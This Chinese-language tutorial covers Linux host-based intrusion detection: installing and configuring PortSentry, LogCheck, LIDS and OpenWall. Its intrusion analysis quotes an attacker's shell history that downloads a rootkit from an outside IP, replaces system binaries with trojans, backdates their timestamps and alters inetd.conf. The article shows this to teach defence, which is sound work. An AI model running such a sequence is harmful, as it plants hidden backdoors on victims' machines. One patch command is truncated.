Linux入侵檢查

 

Linux入侵監測系統

from: http://www.1717happy.com/?action=show&id=103

這篇文章主要是關於適用於Linux的幾種基於主機的入侵偵測系統。特別的，我們將會覆蓋一些怎麼安裝這些軟體包的要素，已經它們的用處和什麼時候能夠用到這些東西。

系統安全

本文將為大家展示一些基礎的系統安全知識。特別的，我假設很多常見的安全措施已經被用來抵抗來自Internet對主機的入侵。這些安全措施主要是：

防火牆，確定了系統的來自Internet的使用者對哪些TCP或者UDP連接埠有訪問的許可權。例如：我們通過一些很簡單的Web Server防火牆的規則設定，就可以確定這台機器只有用來提供http服務的80連接埠向使用者開放。

系統是不需要沒有用處的守護進程的。例如：一個Web伺服器一般只需要一個正在啟動並執行進程來服務Web頁面。進程並不是就是和服務與Web頁面相關聯的，譬如RPC/Portmap服務，NFS服務，X Font服務，DNS網域名稱服務 (DNS)，其他外來的或者是沒有什麼用處的應用軟體應該被關掉或者是禁用。在Red Hat Linux的系統中，通常我們用一種運行等級的編輯器來進行有關的設定，譬如我們可以用ntsysv 或者tksysv來禁用其中的那些沒有要求的守護進程。

通過編輯和修改/etc/inetd.conf可以屏蔽一些不用的連接埠。作為一個典型的預設值，我們安裝一個新的Linux系統的時候，/etc/inetd.conf預設的開啟了很多連接埠。所有的系統都應該通過編輯 /etc/inetd.conf，刪除或者是注釋掉其中的一些行，用來禁用那些沒有用處的連接埠，這是最基本的系統安全行為。

警戒線（Lines of Defense）：

一、多層系統安全

這一部分，我們將討論一個多層通道的系統安全問題。當其中一些安全層被破壞的時候，很多安全層能夠獨立的應用來提供一些額外的防衛。構建一種多層結構的系統安全模型。

圖表中的每一層都會為自己的上一層提供額外的資料保護。例如：第一層是防火牆，如果防火牆沒有阻擋住外界的入侵嘗試，那麼第二層-連接埠精靈就會提供額外的保護。進一步，裡面的安全系統是LIDS和LogCheck程式，在入侵嘗試沒有被第二層截獲的時候也會進行保護。

監控當前串連

防火牆後的第一防護層是用來監控當前與主機的串連嘗試的軟體包。連接埠精靈包（ http://www.psionic.com/abacus/portsentry/ ）提供了一些簡潔和有用方式來完成這些事情。

連接埠守護（PortSentry）程式的作用

連接埠精靈的主要作用監控一些特殊的TCP/IP連接埠的活動情況。PortSentry監視並報告一些連接埠的活動，其中的一種情況可能被選中，包括拒絕進一步的串連嘗試。這是一種很重要的防護措施，因為一般的駭客在入侵一個系統之前都會將會使用一些工具來探測系統的漏洞和弱點。察覺到探測器或者是連接埠掃描，就可以徹底的切斷一些潛在地駭客進一步的串連嘗試，中止一些帶有入侵意圖的進一步的連接埠掃描。

安裝PortSentry

對於Red Hat的使用者來說，Red Hat的ftp伺服器上的RPM包裡麵包含了這個程式。這個網站在全球都有它的鏡像，你可以在www.redhat.com上面尋找距離你最近的網站。我還不能確定.deb格式的軟體包中間是PortSentry這樣的程式，但是我可以確認那裡肯定是有這個軟體的。對於其他Linux使用者來說，通過原碼來安裝這個軟體也是相當地簡單的。

推薦配置

PortSentry有很多運行模式，包括不同的UDP和TCP秘密啟動並執行模式。我選擇的運行機制是把PortSentry綁定在那些沒有被使用的或者是認為有潛在的入侵可能的TCP連接埠上。例如：我將24小時連續的掃描我的 web伺服器上面的這些連接埠，port 143 (imap2), port 111 (portmap) 和port 23 (telnet)都是我的Internet系統上沒有使用的TCP連接埠。你可以通過這條命令：

portsentry -tcp

在你的系統啟動的時候就使PortSentry進入基本的TCP運行模式。同時要保證PortSentry的設定檔portsentry.conf中包含了TCP_PORTS這行配置來掃描你需要進行掃描的連接埠。

反應選項

你能通過portsentry.conf中的"Response Options"部分來詳細的說明什麼樣的反應是PortSentry察覺了一些不期望的串連。通常我會使用ipchains來中斷那些來自於串連的源方的進一步串連。這個也可以通過portsentry.conf中下面這樣一行來進行配置：

KILL_ROUTE="/sbin/ipchains -I input -s $TARGET$ -j DENY -l"

在接受來自高連接埠的掃描行為的時候，可以通過刪除上面一行中的-l這個選項來屏蔽這些進一步的串連，可以有效維持系統日誌空間。

監視系統日誌

諸如防火牆系統、PortSentry這樣的軟體可以有效監視或者是屏蔽一些連接埠的不期望的串連。這樣可以防止最典型的那種"掃描－入侵"的攻擊方式。

當系統需要運行特殊的服務（例如：Apache Web Server，或者是綁定了一個DNS服務）的時候，同時有駭客破解了這種服務中的一些攻擊點，這些程式就會很不幸運的不能保持把所有的入侵者拒之門外。綁定運行著一個容易受攻擊的程式的DNS伺服器，這些連接埠最終總是要被一些駭客通過掃描很廣範圍的機器的特定的一個連接埠，並且會試圖通過這個連接埠來入侵系統。很不幸，防火牆或者是PortSentry程式會將這些入侵嘗試當作正常的合理的串連。

系統日誌檢測（LogCheck）

LogCheck 是用來掃描系統記錄檔的軟體（http://www.psionic.com/abacus/logcheck/ ）。LogCheck會掃描系統記錄檔（在Linux系統中，系統記錄檔在/var/log/目錄下面），同時當系統出現一些異常的時候， LogCheck就會通過Email來通報給管理員。系統記錄檔中的異常的訊息通常是表示有一些駭客正在嘗試入侵或者是正在侵入系統。

安裝LogCheck

LogCheck 有四個主要的設定檔。在RPM版本中，這幾個設定檔在/etc/logcheck目錄下面。通常我們只需要配置logcheck.ignore和 logcheck.violations.ignore這兩個檔案。我在安裝完LogCheck後的程式一般是這樣的：

允許LogCheck在正常的運行模式下面運行一次，這樣將會一個巨大的輸出檔案，不過我們可以把這個檔案刪除算了。

24小時以後讓LogCheck再次運行一次，這次我們會在記錄檔的入口處中發現產生了一些新的東西，同時也是一個很大的但是仍然可以計算大小的檔案。仔細的閱讀這個檔案。

在檔案的入口處有一些不需要我們關心的特定的字串，如果這些字串時一些"違反安全"的片斷，我們可以將這些字串片斷加入到 logcheck.violations.ignore檔案中；或者當他們是"異常系統事件"的時候，我們就將這些字串加到 logcheck.ignore中。

在這幾個星期中，每隔12~24小時就重複一下這些步驟。在這個階段中，我們反覆的設定.ignore檔案的過濾規則，最後剩下的就是我們的系統真正關心的了。

注意到RPM檔案指定LogCheck每小時運行一次，但是我只需要每天運行一次，除非是在特定的需要受監視的系統。這樣可以每天把/etc/cron.hourly/logcheck這個檔案拷貝到/etc/cron中一次。

基於核心的入侵檢測

基於核心的入侵檢測是一種相當巧妙的新型的Linux入侵偵測系統。現在最主要的基於核心的入侵偵測系統叫做LIDS，並可以從http://www.lids.org/ 下載。

什麼是LIDS？

LIDS是一種基於Linux核心的入侵檢測和預防系統。

LIDS 的保護目的是防止超級使用者root的篡改系統重要部分的。LIDS主要的特點是提高系統的安全性，防止直接的連接埠串連或者是儲存空間串連，防止原始磁碟的使用，同時還要保護系統記錄檔。LIDS當然也會適當制止一些特定的系統操作，譬如：安裝sniffer、修改防火牆的設定檔。

LIDS文檔工程

LIDS比安裝PortSentry和LogCheck要複雜一點，但是很幸運的是，在LIDS的首頁上面有詳細的安裝和配置手冊。

安裝LIDS

首先，在安裝之前，我們需要大部分最新的LIDS軟體包（我使用的是0.9）和適當的核心版本。我現在使用的是從Red Hat首頁上下載的2.2.14-12版本的核心，因為其中包含一些安全補丁。同時你也需要你使用的核心的一些原始碼。

現在的LIDS主要是適用於2.2.14版本的核心。我安裝的在2.2.14的核心的Red Hat Linux 6.2上面安裝了LIDS。在安裝LIDS之前，我在ftp.redhat.com下載了最新的核心版本，並且依照http: //www.redhat.com/support/docs/howto/kernel-upgrade/kernel-upgrade.html 安裝了這個核心。

接著的事情就是升級核心原始碼。這裡我們是這樣做的：

rpm -Uhv kernel-source-2.2.14-12.i386.rpm

然後就是編譯和安裝lidsadm這個程式：

cd /usr/local/src/security/lids-0.9/lidsadm-0.9

make

make install

產生一個RipeMD-160口令，這個以後將會在安裝進核心的：

lidsadm -P

輸入口令是"anypass"，得到秘鑰"d502d92bfead11d1ef17887c9db07a78108859e8"。接著，我把Redhat的設定檔拷貝到我的結構體系中，在/usr/src/linux目錄下面：

cd /usr/src/linux/configs/

cp kernel-2.2.12-i686.config ..

下面我們就使用下面的命令來安裝LIDS：

cd /usr/src

patch -p0 同時我們應該注意到Red Hat所提供的核心和Linus發布的標準的2.2.14版本的核心有一些細微的差別，因為其中包含一些修改過的驅動程式。同樣lids-0.9- 2.2.14-redhat.patch檔案也是和LIDS發布的標準的lids-0.9-2.2.14.patch有一些細微的差別，不過可能後者並不是特別適合於Red Hat系統。

最後，就是配置、編譯和安裝核心了：

cd /usr/src/linux

make menuconfig

make dep; make clean

make

install; make modules; make modules_install

下面的指令碼展示了在配置核心的過程中我設定的LIDS配置選項：

[*] Linux Intrusion Detection System support (EXPERIMENTAL)

--- LIDS features

[ ] Hang up console when raising a securit alert

[*] Security alert when execing unprotected programs before sealing

[ ] Do not execute unprotected programs before sealing LIDS

[*] Enable init children lock feature

[*] Try not to flood logs

(60) Authorised time between two identic logs (seconds)

[*] Allow switching LIDS protections

RipeMD-160 encrypted password: d502d92bfead11d1ef17887c9db07a78108859e8

(3) Number of attempts to submit password

(3) Time to wait after a fail (seconds)

[*] Allow remote users to switch LIDS protections

[ ] Allow any program to switch LIDS protections

[*] Allow reloading config. file

[ ] Hide some known processes

[*] Port Scanner Detector in kernel

[ ] Send security alerts through network

--- Special authorizations

[ ] Allow some known processes to access /dev/mem (xfree, etc.)

[ ] Allow some known processes to access raw disk devices

[ ] Allow some known processes to access io ports

[ ] Allow some known processes to change routes

--- Special UPS

[*] Allow some known processes to unmount devices

Allowed processes: "/etc/rc.d/init.d/halt;/etc/rc.d/init.d/netfs"

[*] Unmounting capability is inherited

[*] Allow some known processes to kill init children

Allowed processes: "/etc/rc.d/init.d/halt"

[*] Killing capability is inherited

看得出，我沒有使用UPS，同時啟動並執行是一個需要能夠遠端存取的伺服器，我就按照上面的檔案進行了配置，但是在實際應用過程中，每個人的系統根據環境不一樣，會有一些差別。

配置LIDS:

有一條特別要引起注意：在你的系統的下一次重啟之前就應該配置好LIDS！我們應該使用lidsam來配置LIDS的設定檔 /etc/lids.conf，而不能手動的修改。運行"lidsadm -h"可以獲得一些關於如何使用lidsadm這個程式的協助。LIDS提供了很多使用LIDS保護檔案的例子，例如：

lidsadm -A -r /sbin 這條命令保護/sbin整個目錄，並且表示唯讀。

我首先的LIDS設定檔應該是這樣的：

lidsadm -Z

lidsadm -A -r /usr/bin

lidsadm -A -r /bin

lidsadm -A -r /usr/sbin

lidsadm -A -r /sbin

lidsadm -A -r /usr/X11R6/bin

lidsadm -A -r /etc/rc.d

lidsadm -A -r /etc/sysconfig

一旦配置了LIDS的設定檔，就應該修改系統的開機檔案保證在系統啟動的時候就能運行LIDS，這樣就能有效在核心中啟動LIDS的作用。一般我都是把 lidsadm加到/etc/rc.d/rc.local的末尾，這樣能夠保證LIDS的功能不會妨礙系統的其他應用程式的正常啟動。下面就是我加在 /etc/rc/d/rc.local中用來啟動LIDS的指令碼：

/sbin/lidsadm -I -- -CAP_SYS_MODULE -CAP_SYS_RAWIO -CAP_SYS_ADMIN

-CAP_SYS_PTRACE -CAP_NET_ADMIN -CAP_LINUX_IMMUTABLE

+INIT_CHILDREN_LOCK

配置lilo

我們知道，使用Redhat的RPMS升級系統核心以後需要重新設定lilo.conf來保證編譯載入

過LIDS的新核心能夠正常的啟動。在下次重啟之後，LIDS將會在系統中運行，不過如果你需要停止LIDS而執行一些系統的任務，就應該按照下面的命令進行：

/sbin/lidsadm -S -- -LIDS或者/sbin/lidsadm -S -- -LIDS_GLOBAL

你需要提供LIDS的口令，當時在編譯核心的時候在核心中加入了RipeMD-160格式。

不知道你是否注意到了，在shutdown的指令碼中，很多指令碼都不能正常的工作。最終的shutdown指令碼/etc/rc.d/init.d/halt將會停止所有的進程和卸載檔案系統。由於在檔案rc.local中 "+INIT_CHILDREN_LOCK"的保護作用，其他的進程都沒有許可權來殺掉init()的其他子進程。同時每隔10分鐘，你就會收到一個關於 "rmmod as"不能卸載模組的出錯資訊。這個主要是由於LIDS啟動以後"-CAP_SYS_MODULE"的保護使得模組的插入或者卸載出現了毛病。我們可以刪除/etc/cron.d/kmod這個檔案來防止出錯資訊繼續發生。

LIDS能夠保護什嗎？

快速的瀏覽LIDS的文檔就可以瞭解LIDS的一系列特性。而我認為下面的這些特性是最重要的：

CAP_LINUX_IMMUTABLE 當檔案和外那間系統被標識"immutable"防止被寫；

CAP_NET_ADMIN 防止篡改網路設定（例如：防止路由表被修改）；

CAP_SYS_MODULE 防止核心模組被插入或者移除；

CAP_SYS_RAWIO 防止損壞磁碟或者裝置I/O；

CAP_SYS_ADMIN 防止大範圍的使用其他系統功能；

INIT_CHILDREN_LOCK which prevents child processes of the init() master pro

cess from being tampered with.

無論在哪個點，上面這些特性都能夠通過命令"lidsadm -I"來啟動，通過"lidsadm -S"來禁用（可以允許真正的系統管理員來進行系統配置），同時提供已經安裝在核心中的LIDS口令（是通過RipeMD-160加密的）。剖析一次入侵

最近我一直忙於檢查一些被黑過的機器，來推斷一些被入侵的原因還有核實駭客對系統破壞。很幸運，一些駭客不是特別的聰明，在入侵一些系統之後沒有設法徹底的抹掉痕迹。當駭客把一些系統守護進程的緩衝區溢位以後就可以獲得root許可權，這個時候就是主機被入侵了（事實上是不可能發生的，但是安裝Linux系統的人忘記了打上RedHat最新的關於緩衝區溢位的補丁程式，並且讓系統一直運行著）。當然一些駭客也不夠小心，當他們侵入主機後，很急切的獲得了 shell，但是他們經常沒有考慮到BASH的命令將會被存入系統記錄檔中，簡單的閱讀/.bash_history就可以瞭解駭客到底怎麼機器上面作

了一些什麼事情。這個檔案我們可以看看（為了更加簡單我們做過一些細微的修改）：

mkdir /usr/lib/... ; cd /usr/lib/...

ftp 200.192.58.201 21

cd /usr/lib/...

mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz? pstree.gz;

mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz;

mv tcpd.gz? tcpd.gz

gzip -d *

chmod +x *

mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin;

mv pt07 /usr/lib/; mv pstree /usr/bin ;

/usr/lib/pt07

touch -t 199910122110 /usr/lib/pt07

touch -t 199910122110 /usr/sbin/syslogd

touch -t 199910122110 /usr/sbin/tcpd

touch -t 199910122110 /bin/ps

touch -t 199910122110 /bin/netstat

touch -t 199910122110 /usr/bin/pstree

cat /etc/inetd.conf | grep -v 15678 >> /tmp/b

mv /tmp/b /etc/inetd.conf

killall -HUP inetd

通讀這些內容，我們就可以瞭解下面的一些動作：

系統中建立了一個名字異常的目錄（/usr/lib），接著駭客telnet到了自己的主機上面

（200.192.58.201，是Brazil某個地方的撥號使用者），同時下載了一套駭客工具。這些

駭客工具屍沒有經過壓縮的，中間的一些特洛伊二進位程式被安裝到了系統中了，這些

特洛亦程式覆蓋了系統的netstat，ps， tcpd， syslogd和pstree命令。這些程式是用

來報告系統有那些進程正在運行，那些連接埠是開啟的。

我們從中能學到什麼呢？

首先，LIDS是不能阻止一次入侵的，駭客串連上主機通過緩衝區溢位的方式獲得系統的

root許可權。

一旦系統沒有駭客入侵，我們看看LIDS是如何使破壞降到最低的：

LIDS通過CAP_LINUX_IMMUTABLE選項可以防止特洛亦程式被寫入到/bin，/usr/bin， /u

sr/sbin和/usr/lib目錄中。這些目錄我們一般都會標識為不可變的（chattr +i），因

而也不會被修改。我們可以注意到，就算不使用LIDS，也可以通過chattr +I命令來標識

目錄為不可變的，但是如果是通過LIDS以後，即使是root也不能篡改不可變標識位。類

似的，如果檔案通過chattr +I被標識為，touck -t這個命令也會失敗。甚至第一行的"

mkdir /etc/lib"這個命令也會失敗，如果我們標識檔案為不可讀的話。

LIDS不能防止駭客入侵，但是可以防止入侵的駭客在侵入後進行很大的系統破壞。一個

後門程式可以被安裝上系統，但是沒有特洛亦版本的ps，netstat和pstree能夠很早的發

現這個後門進程，然後kill之。如果沒有LIDS，我們不可能知道駭客通過這個後門程式

會做一些什麼事情，我們唯一能夠進行挽回的工作就是重裝系統。

OpenWall和LIDS：額外的層

另外一個和LIDS相似的系統是OpenWall工程（http://www.openwall.com/linux/ ）。OpenWall工程在很多地方和LIDS不一樣，有一個OpenWall的特別的補丁就是使棧區為不可執行。下面是摘自OpenWall的README文檔裡面的申明：

大多數緩衝區溢位攻擊都是基於覆蓋一些隨意的程式片段中的函數傳回值在堆棧中的地址，如果堆棧為不可執行，那麼緩衝區溢位的弱點將會變得很難攻擊。另外一種緩衝區溢位的方式是在libc中指出一個函數的返回地址，通常是system()。這個補丁通過修改mmap()化的共用庫，使其總是一個零位元組的檔案。這樣使其不能再指定一些資料，在很多攻擊中不得不使用ASCIIZ字串。

最近，在LIDS的網上上有一些完整的LIDS＋OpenWall的核心補丁，這樣可以提供LIDS和OpenWall都具備的特性。總結

在Linux系統中，通過使用這一系列的多層的安全措施，可以防止很大範圍的攻擊，同時還可以防止入侵或者篡改。系統被駭客入侵口就是網路介面，在網路介面，系統核心上我們都可以防止他人的入侵。

意識到系統中的一些潛在的安全性漏洞。任何運行在系統上的守護進程或者服務，不管是root使用者還是非root使用者啟動並執行，都能夠成為一個潛在的安全威脅。充分準備好面對這些威脅。